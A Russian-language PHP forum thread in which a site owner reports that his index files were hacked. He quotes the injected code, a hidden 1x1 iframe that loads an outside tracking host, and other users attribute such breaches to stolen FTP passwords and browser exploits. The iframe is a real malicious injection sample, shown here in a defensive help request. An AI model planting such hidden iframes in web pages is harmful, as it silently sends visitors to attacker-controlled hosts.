Хакнули сайт

akxxiv

Новичок
Хакнули сайт

Хакнули сайт. В индексный файл, а так же в файлы с названием index.php и default.php добавили такой вот код:
PHP:
<iframe src=\"http://hosttracker.net/?click=60911859\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>
Вопрос - кто-нибудь с таким сталкивался, и каким образом это может быть сделано? Как поступать в таких случаях, как найти дыру?
Хостинг виртуальный на агаве.
 

Иван 76

Новичок
Не пользуйся менеджером сохранения паролей в браузерах и ФТП-клиентах. Делай антивирусную проверку своего компа. Есть даже бесплатные антивирусные утилиты, например avast, CureIt от DrWeb и пр.
Смени ФТП - пароль на хостинге.
 

antson

Новичок
Партнер клуба
Mr.M.I.T.
последние 2года сайты ломают на 99,9% процентов
через угон фтп паролей.
Пока IE дает :
а) через HTTP_Request скачать файл
б) записать его на диск в любое место (народ должен отучиться сидет под админом на домашнем компе)
в) да еще его запустить на выполнение

имхо никто не будет искать дыры в сайте,
им пароли и так на блюдечке приносятся.
 

Активист

Активист
Команда форума
а еще нормальной антивирусную защиту не покупают... предпочитают воровать...

-~{}~ 07.11.08 07:33:

кстати. не только IE....
 

antson

Новичок
Партнер клуба
Активист
угу :( оперу через пдф научились пробивать гдето в августе этого года.
 

AmdY

Пью пиво
Команда форума
antson
не трогайте бедного ослика ломают всё. а у большинства стоит пиратская винда, в которой изначально зашит хацкерский софт.
у меня както фтп сломали, на который я лазал только из под линухи

-~{}~ 07.11.08 07:49:

а через сафари мак сломали, а огнелис и вовсе скоре догонит бедный ие, особенно с плагинами
 

Активист

Активист
Команда форума
>у меня както фтп сломали, на который я лазал только из под линухи

Это как? Из под рута запустил трояна?
 

AmdY

Пью пиво
Команда форума
Активист
да вот чего не знаю, того не знаю, к тому времени я уже разучился под рутом работать. здесь либо меня, либо сервак сломали, на котором фряха :(
 

Активист

Активист
Команда форума
AmdY
Сперли хеш из shadow и подбирали?)))) На сервере))?

У мну была маниакальная идея - поймать троян, когда сидел под debian в качестве десктопа в течении года... не нашел... хотя так хотел...
 

igortik

Новичок
Да, фтп.
Тоже был случай, всунули iframe в индекс-страницу.
Смена фтп данных на более продвинутых, нежели возможных подобрать за 3-4 часа брут-форсом помогло.

Только до сих пор не ясно зачем это кому-то понадобилось, там аудитории от силы 50 в сутки и тематика не детская, где юные хацкеры путешествуют.
 
Сверху